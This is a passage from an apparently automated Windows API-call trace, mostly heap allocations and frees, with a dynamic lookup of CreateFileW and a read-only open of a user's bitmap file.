Size=0x20) returned 0x43cf4a0 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0086.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0086.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0086.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0086.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0086.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0086.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0086.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0086.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0086.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0086.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0086.682] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0086.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0086.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0086.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0086.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0086.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0086.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0086.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0086.683] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0086.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0086.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0086.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0086.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0086.684] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0086.684] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0086.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0086.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0086.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0086.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0086.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0086.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0086.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0086.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0086.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0086.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0086.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0086.685] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0086.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0086.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0086.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0086.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0086.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0086.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0086.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0086.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0086.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0086.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0086.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0086.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0086.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0086.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0086.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0086.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0086.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0086.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0086.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0086.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0086.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0086.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0086.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0086.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0086.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0086.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0086.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0086.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0086.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0086.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0086.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0086.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0086.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0086.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0086.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0086.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0086.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0086.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0086.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0086.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0086.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0086.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0086.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0086.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0086.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0086.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0086.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0086.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0086.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0086.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0086.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0086.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0086.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0086.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0086.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0086.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0086.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0086.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0086.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0086.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0086.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0086.688] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0086.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0086.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0086.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca238 [0086.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca238, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0086.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.689] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0086.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0086.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0086.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0086.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0086.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0086.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0086.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0086.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0086.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0086.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0086.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0086.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0086.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0086.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0086.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0086.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0086.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0086.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0086.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0086.766] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\5MOGH3JqsJ.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\5mogh3jqsj.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0086.766] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0086.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0086.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0086.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0086.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0086.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0086.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0086.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0086.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0086.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0086.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0086.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0086.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0086.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0086.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a138 [0086.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0086.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0086.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0086.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0086.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0086.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0086.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 